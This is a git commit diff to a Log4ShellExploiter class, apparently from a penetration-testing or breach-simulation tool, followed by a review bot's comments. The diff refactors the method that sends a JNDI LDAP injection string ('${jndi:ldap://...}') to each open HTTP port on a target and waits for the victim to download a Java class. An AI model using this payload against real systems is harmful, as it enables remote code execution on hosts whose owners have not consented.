Agent: remove unused upload_monkey() and rename _trigger_exploit

vakarisz 2022-01-06 13:00:37 +02:00
parent 7bace927f8
commit 0cd6b1e616
1 changed files with 18 additions and 24 deletions


@ -84,26 +84,6 @@ class Log4ShellExploiter(WebRCE):
# If java class was downloaded it means that victim is vulnerable # If java class was downloaded it means that victim is vulnerable
return Log4ShellExploiter.HTTPHandler.class_downloaded return Log4ShellExploiter.HTTPHandler.class_downloaded
def _trigger_exploit(self):
# Try to exploit all services,
# because we don't know which services are running and on which ports
open_ports = [
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
]
for exploit in get_log4shell_service_exploiters():
for port in open_ports:
exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
# Wait for request
sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
if Log4ShellExploiter.HTTPHandler.class_downloaded:
self.exploit_info["vulnerable_service"] = {
"service_name": exploit.service_name,
"port": port,
}
return
def build_ldap_payload(self): def build_ldap_payload(self):
interface_ip = get_interface_to_target(self.host.ip_addr) interface_ip = get_interface_to_target(self.host.ip_addr)
return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}" return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
@ -132,11 +112,25 @@ class Log4ShellExploiter(WebRCE):
else: else:
return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH) return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH)
def upload_monkey(self, url, commands=None):
pass
def exploit(self, url, command): def exploit(self, url, command):
pass # Try to exploit all services,
# because we don't know which services are running and on which ports
open_ports = [
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
]
for exploit in get_log4shell_service_exploiters():
for port in open_ports:
exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
# Wait for request
sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
if Log4ShellExploiter.HTTPHandler.class_downloaded:
self.exploit_info["vulnerable_service"] = {
"service_name": exploit.service_name,
"port": port,
}
return
class HTTPHandler(http.server.BaseHTTPRequestHandler): class HTTPHandler(http.server.BaseHTTPRequestHandler):
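Review bot: In the second hunk, the body moved into `exploit(self, url, command)` never reads `url` or `command` and returns `None` both when a service calls back and when the loops run out, so a caller cannot tell the two outcomes apart from the return value. The outcome is carried only by `Log4ShellExploiter.HTTPHandler.class_downloaded`, a class-level attribute; unless it is reset somewhere outside this diff, a callback recorded for one host would still be set when the next host is checked and could be reported as a false "vulnerable" finding. Consider making the result explicit with `return True` inside the `if` and `return False` after the loops, and resetting the flag before the loop starts. A short docstring should say that the two parameters are unused and presumably kept only to match the `WebRCE` signature. Separately, `self.build_ldap_payload()` is loop-invariant and could be computed once before the `for` loops.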